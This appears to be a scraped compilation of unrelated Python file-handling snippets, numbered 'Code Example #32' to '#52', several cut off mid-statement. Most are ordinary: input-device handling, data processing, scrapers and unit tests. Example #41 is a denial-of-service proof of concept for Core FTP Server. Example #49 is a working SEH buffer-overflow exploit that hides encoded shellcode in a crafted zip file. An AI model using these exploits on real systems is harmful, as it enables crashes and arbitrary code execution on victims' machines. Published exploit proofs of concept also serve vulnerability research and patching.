    sys.stdout = open('./results/log' + countries[i] + str(i) + '.txt', "w")
    print(optimal[i])
    sys.stdout.close()
    sys.stdout = stdoutOrigin
Code Example #32
File: hidinput.py Project: ach5910/KivyApp
        def _thread_run(self, **kwargs):
            input_fn = kwargs.get('input_fn')
            queue = self.queue
            dispatch_queue = self.dispatch_queue
            device = kwargs.get('device')
            drs = kwargs.get('default_ranges').get
            touches = {}
            touches_sent = []
            point = {}
            l_points = []

            # prepare some vars to get limit of some component
            range_min_position_x = 0
            range_max_position_x = 2048
            range_min_position_y = 0
            range_max_position_y = 2048
            range_min_pressure = 0
            range_max_pressure = 255
            range_min_abs_x = 0
            range_max_abs_x = 255
            range_min_abs_y = 0
            range_max_abs_y = 255
            range_min_abs_pressure = 0
            range_max_abs_pressure = 255
            invert_x = int(bool(drs('invert_x', 0)))
            invert_y = int(bool(drs('invert_y', 1)))
            rotation = drs('rotation', 0)

            def assign_coord(point, value, invert, coords):
                cx, cy = coords
                if invert:
                    value = 1. - value
                if rotation == 0:
                    point[cx] = value
                elif rotation == 90:
                    point[cy] = value
                elif rotation == 180:
                    point[cx] = 1. - value
                elif rotation == 270:
                    point[cy] = 1. - value

            def assign_rel_coord(point, value, invert, coords):
                cx, cy = coords
                if invert:
                    value = -1 * value
                if rotation == 0:
                    point[cx] += value
                elif rotation == 90:
                    point[cy] += value
                elif rotation == 180:
                    point[cx] += -value
                elif rotation == 270:
                    point[cy] += -value

            def process_as_multitouch(tv_sec, tv_usec, ev_type,
                                      ev_code, ev_value):
                # sync event
                if ev_type == EV_SYN:
                    if ev_code == SYN_MT_REPORT:
                        if 'id' not in point:
                            return
                        l_points.append(point.copy())
                    elif ev_code == SYN_REPORT:
                        process(l_points)
                        del l_points[:]

                elif ev_type == EV_MSC and ev_code in (MSC_RAW, MSC_SCAN):
                    pass

                else:
                    # compute multitouch track
                    if ev_code == ABS_MT_TRACKING_ID:
                        point.clear()
                        point['id'] = ev_value
                    elif ev_code == ABS_MT_POSITION_X:
                        val = normalize(ev_value,
                                        range_min_position_x,
                                        range_max_position_x)
                        assign_coord(point, val, invert_x, 'xy')
                    elif ev_code == ABS_MT_POSITION_Y:
                        val = 1. - normalize(ev_value,
                                             range_min_position_y,
                                             range_max_position_y)
                        assign_coord(point, val, invert_y, 'yx')
                    elif ev_code == ABS_MT_ORIENTATION:
                        point['orientation'] = ev_value
                    elif ev_code == ABS_MT_BLOB_ID:
                        point['blobid'] = ev_value
                    elif ev_code == ABS_MT_PRESSURE:
                        point['pressure'] = normalize(ev_value,
                                                      range_min_pressure,
                                                      range_max_pressure)
                    elif ev_code == ABS_MT_TOUCH_MAJOR:
                        point['size_w'] = ev_value
                    elif ev_code == ABS_MT_TOUCH_MINOR:
                        point['size_h'] = ev_value

            def process_as_mouse_or_keyboard(
                tv_sec, tv_usec, ev_type, ev_code, ev_value):
                if ev_type == EV_SYN:
                    if ev_code == SYN_REPORT:
                        process([point])
                elif ev_type == EV_REL:
                    if ev_code == 0:
                        assign_rel_coord(point,
                            min(1., max(-1., ev_value / 1000.)),
                            invert_x, 'xy')
                    elif ev_code == 1:
                        assign_rel_coord(point,
                            min(1., max(-1., ev_value / 1000.)),
                            invert_y, 'yx')
                elif ev_type != EV_KEY:
                    if ev_code == ABS_X:
                        val = normalize(ev_value,
                                        range_min_abs_x,
                                        range_max_abs_x)
                        assign_coord(point, val, invert_x, 'xy')
                    elif ev_code == ABS_Y:
                        val = 1. - normalize(ev_value,
                                             range_min_abs_y,
                                             range_max_abs_y)
                        assign_coord(point, val, invert_y, 'yx')
                    elif ev_code == ABS_PRESSURE:
                        point['pressure'] = normalize(ev_value,
                                                      range_min_abs_pressure,
                                                      range_max_abs_pressure)
                else:
                    buttons = {
                        272: 'left',
                        273: 'right',
                        274: 'middle',
                        275: 'side',
                        276: 'extra',
                        277: 'forward',
                        278: 'back',
                        279: 'task',
                        330: 'touch',
                        320: 'pen'}

                    if ev_code in buttons.keys():
                        if ev_value:
                            if 'button' not in point:
                                point['button'] = buttons[ev_code]
                                point['id'] += 1
                                if '_avoid' in point:
                                    del point['_avoid']
                        elif 'button' in point:
                            if point['button'] == buttons[ev_code]:
                                del point['button']
                                point['id'] += 1
                                point['_avoid'] = True
                    else:
                        if ev_value == 1:
                            z = keyboard_keys[ev_code][-1
                                if 'shift' in Window._modifiers else 0]
                            if z == 'shift' or z == 'alt':
                                Window._modifiers.append(z)
                            dispatch_queue.append(('key_down', (
                                Keyboard.keycodes[z.lower()], ev_code,
                                keys_str.get(z, z), Window._modifiers)))
                        elif ev_value == 0:
                            z = keyboard_keys[ev_code][-1
                                if 'shift' in Window._modifiers else 0]
                            dispatch_queue.append(('key_up', (
                                Keyboard.keycodes[z.lower()], ev_code,
                                keys_str.get(z, z), Window._modifiers)))
                            if z == 'shift':
                                Window._modifiers.remove('shift')

            def process(points):
                if not is_multitouch:
                    dispatch_queue.append(('mouse_pos', (
                        points[0]['x'] * Window.width,
                        points[0]['y'] * Window.height)))

                actives = [args['id']
                           for args in points
                           if 'id' in args and '_avoid' not in args]
                for args in points:
                    tid = args['id']
                    try:
                        touch = touches[tid]
                        if touch.sx == args['x'] and touch.sy == args['y']:
                            continue
                        touch.move(args)
                        if tid not in touches_sent:
                            queue.append(('begin', touch))
                            touches_sent.append(tid)
                        queue.append(('update', touch))
                    except KeyError:
                        if '_avoid' not in args:
                            touch = HIDMotionEvent(device, tid, args)
                            touches[touch.id] = touch
                            if tid not in touches_sent:
                                queue.append(('begin', touch))
                                touches_sent.append(tid)

                for tid in list(touches.keys())[:]:
                    if tid not in actives:
                        touch = touches[tid]
                        if tid in touches_sent:
                            touch.update_time_end()
                            queue.append(('end', touch))
                            touches_sent.remove(tid)
                        del touches[tid]

            def normalize(value, vmin, vmax):
                return (value - vmin) / float(vmax - vmin)

            # open the input
            fd = open(input_fn, 'rb')

            # get the controler name (EVIOCGNAME)
            device_name = str(fcntl.ioctl(fd, EVIOCGNAME + (256 << 16),
                                      " " * 256)).split('\x00')[0]
            Logger.info('HIDMotionEvent: using <%s>' % device_name)

            # get abs infos
            bit = fcntl.ioctl(fd, EVIOCGBIT + (EV_MAX << 16), ' ' * sz_l)
            bit, = struct.unpack('Q', bit)
            is_multitouch = False
            for x in range(EV_MAX):
                # preserve this, we may want other things than EV_ABS
                if x != EV_ABS:
                    continue
                # EV_ABS available for this device ?
                if (bit & (1 << x)) == 0:
                    continue
                # ask abs info keys to the devices
                sbit = fcntl.ioctl(fd, EVIOCGBIT + x + (KEY_MAX << 16),
                                   ' ' * sz_l)
                sbit, = struct.unpack('Q', sbit)
                for y in range(KEY_MAX):
                    if (sbit & (1 << y)) == 0:
                        continue
                    absinfo = fcntl.ioctl(fd, EVIOCGABS + y +
                                          (struct_input_absinfo_sz << 16),
                                          ' ' * struct_input_absinfo_sz)
                    abs_value, abs_min, abs_max, abs_fuzz, \
                        abs_flat, abs_res = struct.unpack('iiiiii', absinfo)
                    if y == ABS_MT_POSITION_X:
                        is_multitouch = True
                        range_min_position_x = drs('min_position_x', abs_min)
                        range_max_position_x = drs('max_position_x', abs_max)
                        Logger.info('HIDMotionEvent: ' +
                                    '<%s> range position X is %d - %d' % (
                                        device_name, abs_min, abs_max))
                    elif y == ABS_MT_POSITION_Y:
                        is_multitouch = True
                        range_min_position_y = drs('min_position_y', abs_min)
                        range_max_position_y = drs('max_position_y', abs_max)
                        Logger.info('HIDMotionEvent: ' +
                                    '<%s> range position Y is %d - %d' % (
                                        device_name, abs_min, abs_max))
                    elif y == ABS_MT_PRESSURE:
                        range_min_pressure = drs('min_pressure', abs_min)
                        range_max_pressure = drs('max_pressure', abs_max)
                        Logger.info('HIDMotionEvent: ' +
                                    '<%s> range pressure is %d - %d' % (
                                        device_name, abs_min, abs_max))
                    elif y == ABS_X:
                        range_min_abs_x = drs('min_abs_x', abs_min)
                        range_max_abs_x = drs('max_abs_x', abs_max)
                        Logger.info('HIDMotionEvent: ' +
                                    '<%s> range ABS X position is %d - %d' % (
                                        device_name, abs_min, abs_max))
                    elif y == ABS_Y:
                        range_min_abs_y = drs('min_abs_y', abs_min)
                        range_max_abs_y = drs('max_abs_y', abs_max)
                        Logger.info('HIDMotionEvent: ' +
                                    '<%s> range ABS Y position is %d - %d' % (
                                        device_name, abs_min, abs_max))
                    elif y == ABS_PRESSURE:
                        range_min_abs_pressure = drs(
                            'min_abs_pressure', abs_min)
                        range_max_abs_pressure = drs(
                            'max_abs_pressure', abs_max)
                        Logger.info('HIDMotionEvent: ' +
                                    '<%s> range ABS pressure is %d - %d' % (
                                        device_name, abs_min, abs_max))

            # init the point
            if not is_multitouch:
                point = {'x': .5, 'y': .5, 'id': 0, '_avoid': True}

            # read until the end
            while fd:

                data = fd.read(struct_input_event_sz)
                if len(data) < struct_input_event_sz:
                    break

                # extract each event
                for i in range(int(len(data) / struct_input_event_sz)):
                    ev = data[i * struct_input_event_sz:]

                    # extract timeval + event infos
                    infos = struct.unpack('LLHHi', ev[:struct_input_event_sz])

                    if is_multitouch:
                        process_as_multitouch(*infos)
                    else:
                        process_as_mouse_or_keyboard(*infos)
Code Example #33
def main(args):
    parser = argparse.ArgumentParser(
        description="Merge separate TF rankings for TF discovery")
    parser.add_argument("--network",
                        dest="network",
                        type=str,
                        default="./network.csv")  # Input: TF binding profiling
    parser.add_argument(
        "--interaction",
        dest="interaction",
        type=str,
        default="./interaction.txt")  # Input: Predicted interactions
    parser.add_argument("--ranks_table",
                        dest="ranks_table",
                        type=str,
                        default="./ranks_table.txt")  # Output

    opts = parser.parse_args(args[1:])
    with open(opts.network) as ins:
        lines = [line.split() for line in ins]
    inputNet = np.asarray(lines)

    with open(opts.interaction) as ins:
        lines = [line.split() for line in ins]
    inputInteract = np.asarray(lines)

    print inputNet.shape
    print inputInteract.shape

    # Generate the MElist and TFlist
    MElist = []
    TFlist = []
    for line in inputNet:
        MElist.append(line[0])
        for item in line[1:]:
            if item not in TFlist:
                TFlist.append(item)

    # Generate the importance score mastertable
    IStable = np.zeros((len(MElist), len(TFlist)), dtype=float)
    for line in inputInteract:
        IStable[MElist.index(line[1])][TFlist.index(line[0])] = float(line[2])

    # Calculate the ranks of TFs for each enzyme
    rankTable = []
    for line in IStable:
        rankTable.append(rankdata(line, method='average'))

    # Calculate the Wilcoxon signed-rank test
    rankTestList = []
    for i in range(len(TFlist)):
        for j in range(i + 1, len(TFlist)):
            TF_i = [row[i] for row in rankTable]
            TF_j = [row[j] for row in rankTable]
            statistic, pvalue = wilcoxon(TF_i,
                                         TF_j,
                                         zero_method='wilcox',
                                         correction=False)
            rankTestList.append([
                TFlist[i],
                sum(TF_i), TFlist[j],
                sum(TF_j), statistic, pvalue
            ])

    outfile = open(opts.ranks_table, 'w')
    '''
	outfile.write('MasterTable\t')
	for i in range(len(TFlist)):
		statement = TFlist[i] + '\t'
		outfile.write(statement)
	outfile.write('\n')
	for i in range(len(MElist)):
		statement = MElist[i] + '\t'
		for j in range(len(TFlist)):
			statement += rankTable[i][j].astype('str') + '\t'
		outfile.write(statement)
		outfile.write('\n')


	outfile.write('\n')
	outfile.write('\n')
	outfile.write('\n')
	outfile.write('\n')
	'''

    for i in range(len(rankTestList)):
        statement = rankTestList[i][0] + '\t' + str(
            rankTestList[i][1]) + '\t' + rankTestList[i][2] + '\t' + str(
                rankTestList[i][3]) + '\t' + str(
                    rankTestList[i][4]) + '\t' + str(rankTestList[i][5]) + '\n'
        outfile.write(statement)

    outfile.close()
Code Example #34
import simplejson as json
import sys
from collections import OrderedDict

#print 'Number of arguments:', len(sys.argv), 'arguments.'
#print 'Argument List:', str(sys.argv)

if len(sys.argv) != 2:
	print "Usage: export_sectorial input_file "
	sys.exit(1)

filename = sys.argv[1]

print "Reading from: " + filename
with open(filename, 'r') as f:
     data = json.load(f, object_pairs_hook=OrderedDict)
     
#print data

unitlist = json.loads("[]")

for i in range(len(data)):
	unit = dict();
	unit["comment"] = data[i]["isc"]
	unit["id"] = data[i]["id"]
	unitlist.append(unit)

filename = "sectorial_data.json"

print "Writing to: " + filename
with open(filename, 'w') as outfile:
	json.dump(unitlist, outfile)  # assumed completion: write the unit list built above
Code Example #35
def extract_call_graphs(multi_params):
    asm_files = multi_params.file_list
    ftot = len(asm_files)
    ext_drive = multi_params.ext_drive
    
    pid = os.getpid()
    feature_file = 'data/' + str(pid) + "-" + multi_params.feature_file 
    log_file_name = 'data/' + str(pid) + "-" + multi_params.log_file
    log_file = open(log_file_name, 'w')
    
    print('Process ID: {:d} Graph Feature file: {:s}'.format(pid, feature_file))
    
    graph_lines = []
    graph_features = []
    graph_file = open('data/' + str(pid) + "-" + multi_params.graph_file, 'w') # write as a graphviz DOT format file
    
    with open(feature_file, 'w') as f:
        # write the column names for the csv file
        fw = writer(f)
        #colnames = ['filename','vertex_count','edge_count','delta_max','density','diameter']
        #colnames = ['file_name','vertex_count','edge_count','delta_max','density']
        #fw.writerow(colnames) put in combine_feature_files
        
        # Now iterate through the file list and extract the call graph from each file.
        for idx, fname in enumerate(asm_files):
            fasm = open(ext_drive + fname, 'r') #, errors='ignore')
            lines = fasm.readlines()
            fasm.close()
            
            call_graph = construct_call_graph(lines, log_file)
            cgvc = call_graph.n_vertices()
            cgec = call_graph.n_edges()
            cgdm = call_graph.delta_max()
            cgde = call_graph.density()
            
            # cdia = call_graph.diameter() this is constantly problematic !!!
            
            fname_parts = fname.split('_') # Truncate the file name to the hash value.
            trunc_name = fname_parts[1]
            trunc_name = trunc_name[:trunc_name.find('.pe.asm')]
            
            graph_features.append([trunc_name] + [cgvc, cgec, cgdm, cgde])
            call_graph.set_graph_name(trunc_name)
            #graph_lines.append(call_graph.to_str('multinoleaf')) 
            graph_lines.append(call_graph.to_str('graphviz'))
            
            del(call_graph) # for some reason new graphs get appended to the previous graphs if not deleted???
            
            # Print progress
            if (idx + 1) % 100 == 0:
                print(pid, idx + 1, 'of', ftot, 'files processed.')
                fw.writerows(graph_features)
                graph_file.writelines(graph_lines)
                graph_features = []
                graph_lines = []
                
        # Write remaining files
        if len(graph_lines) > 0:
            fw.writerows(graph_features)
            graph_file.writelines(graph_lines)
            graph_features = []
            graph_lines = []

    graph_file.close()
    log_file.close()
    
    print('Process ID: {:d} finished.'.format(pid))
    
    return
Code Example #36
def _save_to_file(backup_file, backup):
    print("saving to file...")
    with open(backup_file, "w") as f:
        json.dump(backup, f)
Code Example #37
def development(cities, roads, airports):
    roads_list = []
    airports_list = []
    return roads_list, airports_list


if __name__ == "__main__":  
    parser = argparse.ArgumentParser()
    parser.add_argument("--cities", type=int, default=10, help="the number of cities")
    parser.add_argument("--roads", type=str, default="./roads.pk", help="road information")
    parser.add_argument("--airports",type =str, default = './airports.pk', help ="airports information")
    opt = parser.parse_args()

    cities = opt.cities

    f1 = open(opt.roads,"rb")
    f2 = open(opt.airports,"rb")

    roads = pk.load(f1)
    airports = pk.load(f2)

    f1.close()
    f2.close()

    road_list, airport_list = development(cities, roads, airports)

    print("Roads : ", end = "")
    print(road_list)

    print("Airports : ", end = "")
    print(airport_list)
Code Example #38
File: reformatCSV.py Project: mx60s/NBA-Project
import csv

statsFile = open("statsFile.csv")
statReader = csv.reader(statsFile)
newStats = open("reformatted.csv", "w+")

csv_header = "name, season, type, stat"
newStats.write(csv_header + "\n")

header = "season,age,team_id,lg_id,pos,g,gs,mp_per_g,fg_per_g,fga_per_g,fg_pct,fg3_per_g,fg3a_per_g,fg3_pct,fg2_per_g,fg2a_per_g,fg2_pct,efg_pct,ft_per_g,fta_per_g,ft_pct,orb_per_g,drb_per_g,trb_per_g,ast_per_g,stl_per_g,blk_per_g,tov_per_g,pf_per_g,pts_per_g,mp,per,ts_pct,fg3a_per_fga_pct,fta_per_fga_pct,orb_pct,drb_pct,trb_pct,ast_pct,stl_pct,blk_pct,tov_pct,usg_pct,ws-dum,ows,dws,ws,ws_per_48,bpm-dum,obpm,dbpm,bpm,vorp,name"
labels = header.split(",")

count = 0

for row in statReader:
    if count == 0:
        count += 1
        continue

    name = row[len(row) - 1]
    season = row[0]

    for i in range(len(row)):
        if labels[i] in ["season", "name"]:
            continue
        data = name + ", " + season + ", " + labels[i] + ", " + row[i]
        newStats.write(data + "\n")
    
    count += 1

newStats.close()
Code Example #39
        },
                               ignore_index=True)
        SolarServer.test_click_static(
            "http://192.168.1.79/dropdown/dropdown_static.html")
        tmCurrentTime = time.time()
        dataDF = dataDF.append({
            'task': 'click',
            'time': time.time()
        },
                               ignore_index=True)
        SolarServer.test_click_static(
            "http://192.168.1.79/dropdown/dropdown_staticB.html")
        tmCurrentTime = time.time()

    SolarServer.tearDown()
    dataDF = dataDF.append(
        {
            'task': 'stop static ' + str(i),
            'time': time.time()
        },
        ignore_index=True)

# save data to file
# check if the file already exists
try:
    with open(fileName) as csvfile:
        print("This file already exists!")
except IOError:
    dataDF.to_csv(fileName, sep=',', index=False)

print(dataDF)
Code Example #40
File: scraper.py Project: GlinkaG/CeneoScrapper
        features = {  # (opening of the dict comprehension reconstructed; the fragment starts mid-statement)
            key: extract_feature(opinion, *args)
            for key, args in selectors.items()
        }
        features["opinion_id"] = int(opinion["data-entry-id"])
        features["purchased"] = True if features[
            "purchased"] == "Opinia potwierdzona zakupem" else False
        features["useful"] = int(features["useful"])
        features["useless"] = int(features["useless"])
        features["content"] = remove_whitespaces(features["content"])
        features["pros"] = remove_whitespaces(features["pros"])
        features["cons"] = remove_whitespaces(features["cons"])

        opinions_list.append(features)

    try:
        url = url_prefix + page_tree.select("a.pagination__next").pop()["href"]
    except IndexError:
        url = None

    print("url:", url)

with open("app/opinions/" + product_id + ".json", 'w', encoding="UTF-8") as fp:
    json.dump(opinions_list,
              fp,
              ensure_ascii=False,
              separators=(",", ": "),
              indent=4)

#print(len(opinions_list))
#for opinion in opinions_list:
#  pprint.pprint(opinion)
Code Example #41
#Exploit Title: Core FTP/SFTP Server 1.2 - Build 589.42 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-02-13
#Vendor Homepage: http://www.coreftp.com/
#Software Link: http://www.coreftp.com/server/download/archive/CoreFTPServer589.42.exe
#Tested Version: v2-Build 673
#Tested on: Windows 7 Service Pack 1 x32

#Steps to produce the crash:
#1.- Run python code: Core_FTP_SFTP_Server_1.2.py
#2.- Open core_code.txt and copy content to clipboard
#3.- Open Core FTP Server
#4.- Select "Setup" > "New"
#5.- Select "Domain Name" and Put "Test"
#6.- Select "Domain IP/Address" and Put "1.1.1.1"
#7.- Select "Base directory" and Choose a directory path
#8.- Enable "WinNT users"
#9.- Select "User domain" and Paste Clipboard
#10.- Click "Ok", then click "Ok" again in the next window
#11.- The server crashes

cod = "\x41" * 7000

f = open('core_code.txt', 'w')
f.write(cod)
f.close()
Code Example #42
def get_tweets_id(id):
    # (def line reconstructed from the pool.map(get_tweets_id, ids) call below)
    start = time.time()
    URL = 'https://stream.emojitracker.com/subscribe/details/' + str(id)
    tweets = SSEClient(URL)
    results = []
    for tweet in tweets:
        tweetData = json.loads(tweet.data)
        if len(results) >= NUM_TWEETS:
            print("Finished for emoji {}. Time taken: {}".format(
                idToEmoji[id],
                time.time() - start))
            return results
        try:
            if detect(tweetData['text']) == 'en':
                results.append(tweetData['text'] + '\n')
        except LangDetectException:
            continue


idToEmoji = get_ids()
progress = 0
N = len(idToEmoji)
ids = list(idToEmoji.keys())
ids.reverse()
print("# of emojis to get tweets for: {}".format(N))

# Using multiprocessing to speed things up
pool = Pool(processes=8)
data = pool.map(get_tweets_id, ids)
data = [i for sublist in data for i in sublist]
with open('../data/best-twitter-data2.txt', 'w') as f:
    f.writelines(data)
Code Example #43
    def test_parse_many_findings(self):
        testfile = open("unittests/scans/mobsfscan/many_findings.json")
        parser = MobsfscanParser()
        findings = parser.get_findings(testfile, Test())
        testfile.close()
        self.assertEqual(7, len(findings))

        with self.subTest(i=0):
            finding = findings[0]
            self.assertEqual("android_certificate_transparency", finding.title)
            self.assertEqual("Low", finding.severity)
            self.assertEqual(1, finding.nb_occurences)
            self.assertIsNotNone(finding.description)
            self.assertEqual(295, finding.cwe)
            self.assertIsNotNone(finding.references)

        with self.subTest(i=1):
            finding = findings[1]
            self.assertEqual("android_kotlin_hardcoded", finding.title)
            self.assertEqual("Medium", finding.severity)
            self.assertEqual(1, finding.nb_occurences)
            self.assertIsNotNone(finding.description)
            self.assertEqual(798, finding.cwe)
            self.assertIsNotNone(finding.references)
            self.assertEqual("app/src/main/java/com/routes/domain/analytics/event/Signatures.kt", finding.file_path)
            self.assertEqual(10, finding.line)

        with self.subTest(i=2):
            finding = findings[2]
            self.assertEqual("android_prevent_screenshot", finding.title)
            self.assertEqual("Low", finding.severity)
            self.assertEqual(1, finding.nb_occurences)
            self.assertIsNotNone(finding.description)
            self.assertEqual(200, finding.cwe)
            self.assertIsNotNone(finding.references)

        with self.subTest(i=3):
            finding = findings[3]
            self.assertEqual("android_root_detection", finding.title)
            self.assertEqual("Low", finding.severity)
            self.assertEqual(1, finding.nb_occurences)
            self.assertIsNotNone(finding.description)
            self.assertEqual(919, finding.cwe)
            self.assertIsNotNone(finding.references)

        with self.subTest(i=4):
            finding = findings[4]
            self.assertEqual("android_safetynet", finding.title)
            self.assertEqual("Low", finding.severity)
            self.assertEqual(1, finding.nb_occurences)
            self.assertIsNotNone(finding.description)
            self.assertEqual(353, finding.cwe)
            self.assertIsNotNone(finding.references)

        with self.subTest(i=5):
            finding = findings[5]
            self.assertEqual("android_ssl_pinning", finding.title)
            self.assertEqual("Low", finding.severity)
            self.assertEqual(1, finding.nb_occurences)
            self.assertIsNotNone(finding.description)
            self.assertEqual(295, finding.cwe)
            self.assertIsNotNone(finding.references)

        with self.subTest(i=6):
            finding = findings[6]
            self.assertEqual("android_tapjacking", finding.title)
            self.assertEqual("Low", finding.severity)
            self.assertEqual(1, finding.nb_occurences)
            self.assertIsNotNone(finding.description)
            self.assertEqual(200, finding.cwe)
            self.assertIsNotNone(finding.references)
Code Example #44
File: mocks.py Project: zferenczik/taurus
    def dump_config(self):
        """ test """
        fname = temp_file()
        self.config.dump(fname, Configuration.JSON)
        with open(fname) as fh:
            ROOT_LOGGER.debug("JSON:\n%s", fh.read())
Code Example #45
    def setUp(self):
        super(MRJobFileOptionsTestCase, self).setUp()

        self.input_file_path = os.path.join(self.tmp_dir, 'input_file.txt')
        with open(self.input_file_path, 'wb') as f:
            f.write(b'2\n')
Code Example #46
    def test_parse_no_findings(self):
        testfile = open("unittests/scans/mobsfscan/no_findings.json")
        parser = MobsfscanParser()
        findings = parser.get_findings(testfile, Test())
        testfile.close()
        self.assertEqual(0, len(findings))
Code Example #47
    template.insert(start_index, updated_html_code)
    return template


if __name__ == "__main__":
    week = raw_input("Week ID:")
    problem = raw_input("Problem ID:")
    input_file_name = "markdown_files/Week{0}_Problem{1}.md".format(
        week, problem)
    output_file_name = "output_files/Week{0}_Problem{1}.xml".format(
        week, problem)
    #input_file_name = "markdown_files/sample.md"
    #output_file_name = "output_files/sample_output.xml"
    template_file = "template_w_variables.xml"

    f = open(template_file, "r")
    template = f.readlines()
    f.close()

    f = open(input_file_name, "r")
    contents = f.readlines()
    f.close()

    print "generating XML"

    py_code, html_code = read_md(contents)
    template.insert(4, py_code)
    template = convert_html(html_code, template)

    print "writing files ..."
Code Example #48
    def test_jobconf_simulated_by_runner(self):
        input_path = os.path.join(self.tmp_dir, 'input')
        with open(input_path, 'wb') as input_file:
            input_file.write(b'foo\n')

        upload_path = os.path.join(self.tmp_dir, 'upload')
        with open(upload_path, 'wb') as upload_file:
            upload_file.write(b'PAYLOAD')

        # use --no-bootstrap-mrjob so we don't have to worry about
        # mrjob.tar.gz and the setup wrapper script
        self.add_mrjob_to_pythonpath()
        mr_job = MRTestJobConf([
            '-r', self.RUNNER, '--no-bootstrap-mrjob',
            '--jobconf=user.defined=something', '--jobconf=mapred.map.tasks=1',
            '--file', upload_path, input_path
        ])

        mr_job.sandbox()

        results = {}

        # between the single line of input and setting mapred.map.tasks to 1,
        # we should be restricted to only one task, which will give more
        # predictable results

        with mr_job.make_runner() as runner:
            script_path = runner._script_path

            runner.run()

            results.update(dict(mr_job.parse_output(runner.cat_output())))

        working_dir = results['mapreduce.job.local.dir']
        self.assertEqual(
            working_dir,
            os.path.join(runner._get_local_tmp_dir(), 'job_local_dir', '0',
                         'mapper', '0'))

        self.assertEqual(results['mapreduce.job.cache.archives'], '')
        expected_cache_files = [
            script_path + '#mr_test_jobconf.py', upload_path + '#upload'
        ] + [
            '%s#%s' % (path, name)
            for path, name in self._extra_expected_local_files(runner)
        ]
        self.assertEqual(
            sorted(results['mapreduce.job.cache.files'].split(',')),
            sorted(expected_cache_files))
        self.assertEqual(results['mapreduce.job.cache.local.archives'], '')
        expected_local_files = [
            os.path.join(working_dir, 'mr_test_jobconf.py'),
            os.path.join(working_dir, 'upload')
        ] + [
            os.path.join(working_dir, name)
            for path, name in self._extra_expected_local_files(runner)
        ]
        self.assertEqual(
            sorted(results['mapreduce.job.cache.local.files'].split(',')),
            sorted(expected_local_files))
        self.assertEqual(results['mapreduce.job.id'], runner._job_key)

        self.assertEqual(results['mapreduce.map.input.file'], input_path)
        self.assertEqual(results['mapreduce.map.input.length'], '4')
        self.assertEqual(results['mapreduce.map.input.start'], '0')
        self.assertEqual(results['mapreduce.task.attempt.id'],
                         'attempt_%s_mapper_00000_0' % runner._job_key)
        self.assertEqual(results['mapreduce.task.id'],
                         'task_%s_mapper_00000' % runner._job_key)
        self.assertEqual(results['mapreduce.task.ismap'], 'true')
        self.assertEqual(results['mapreduce.task.output.dir'],
                         runner._output_dir)
        self.assertEqual(results['mapreduce.task.partition'], '0')
        self.assertEqual(results['user.defined'], 'something')
Code Example #49
seh = "\x31\x48"  #ppr 0x00480031
nextseh = "\x58\x70"
venetian = ("\x55\x55"
            "\x70"
            "\x58"
            "\x70"
            "\x05\x25\x11"
            "\x55"
            "\x2d\x19\x11"
            "\x55"
            "\x50"
            "\x55"
            "\xc7")
shellcode = (
    "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1"
    "AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLJHDIM0KPM030SYK5P18RQTDK1BNPDK0RLLTKB2MDDKS"
    "BO8LO870JMVNQKOP1I0VLOLQQCLLBNLO091HOLMKQ7WZBL0220W4KQBLPTKOROLKQZ0TKOPRX55WPRTPJKQXP0P"
    "TKOXLXDKQHO0M1J39SOLQ9DKNT4KM1Z601KONQGPFLGQXOLMM197NXIP2UZTLC3MJXOKCMND2UZBPXTK1HO4KQJ"
    "3QVDKLLPKTKB8MLKQJ3TKM4TKKQZ04IOTMTMTQK1KQQQI1JPQKOK0PX1OQJ4KLRJKSVQM1XNSNRM0KPBHD7T3P2"
    "QOR4QXPL2WO6KWKOHUVXDPKQKPKPNIGTQDPPS8MYU0RKM0KOZ5PPPP20PPQ0PPOPPPQXYZLO9OK0KOYEU9Y7NQY"
    "K0SQXKRM0LQ1L3YJFQZLPQFR7QX7RIK07QWKOJ5PSPWS86WIYNXKOKOXUR3R3R7QXD4JLOKYQKOJ5B73YHGBH45"
    "2NPM31KOXUQXC3RMC4M0CYYS1GQGR701ZV2JLRR90VK2KMQVY7OTMTOLKQM1TMOTMTN0I6KPPD1DPPQF261FQ6B"
    "60N26R6PSR6RHRYHLOODFKOIE3YYPPNPVOVKONP38KXTGMM1PKOJ5WKJP6UERB6QX6FTUWMUMKOZ5OLM6SLLJ3P"
    "KKK045M5WKQ7N3RRRORJM0QCKOHUA")
buffer = "\x41" * (205 + 216) + shellcode + "\x41" * (2000 - 216 - len(
    shellcode)) + nextseh + seh + venetian + "\x42" * (6173 - len(venetian))
print len(buffer)
payload = buffer
mefile = open('seh_winarch.zip', 'w')
mefile.write(zip_header + buffer + zip_final)  # zip_header/zip_final are defined in the omitted part of the PoC
mefile.close()
Code Example #50
    def mapper_init(self):
        with open(self.options.platform_file) as f:
            self.multiplier = int(f.read())
Code Example #51
if __name__ == "__main__":
    cmd_set_sleep(0)
    cmd_firmware_ver()
    cmd_set_working_period(PERIOD_CONTINUOUS)
    cmd_set_mode(MODE_QUERY)
    while True:
        cmd_set_sleep(0)
        for t in range(15):
            values = cmd_query_data()
            for i in range(len(values) - 1):
                print("PM2.5: ", values[0], ", PM10: ", values[1])
                time.sleep(2)

        # open stored data
        try:
            with open(JSON_FILE) as json_data:
                data = json.load(json_data)
        except IOError as e:
            data = []

        # check if length is more than 100 and delete first element
        if len(data) > 100:
            data.pop(0)

        # append new values
        jsonrow = {
            'pm25': values[0],
            'pm10': values[1],
            'time': time.strftime("%d.%m.%Y %H:%M:%S")
        }
        data.append(jsonrow)
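
The example is cut off before the loop persists its data; a plausible continuation, assuming the rolling window is written back to JSON_FILE and the sensor sleeps between cycles (the one-minute interval is an assumption):

        # persist the rolling 100-entry window back to disk
        with open(JSON_FILE, 'w') as outfile:
            json.dump(data, outfile)

        # put the sensor to sleep between measurement cycles (interval assumed)
        cmd_set_sleep(1)
        time.sleep(60)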
Code Example #52
File: setup.py Project: viananth/azure-cli
    'Programming Language :: Python :: 2.7',
    'Programming Language :: Python :: 3',
    'Programming Language :: Python :: 3.4',
    'Programming Language :: Python :: 3.5',
    'Programming Language :: Python :: 3.6',
    'License :: OSI Approved :: MIT License',
]

DEPENDENCIES = [
    'azure-cli-core',
    'azure-mgmt-resource==1.1.0',
    'azure-mgmt-storage==1.2.0',
    'azure-mgmt-containerregistry==0.3.1',
]

with open('README.rst', 'r', encoding='utf-8') as f:
    README = f.read()
with open('HISTORY.rst', 'r', encoding='utf-8') as f:
    HISTORY = f.read()

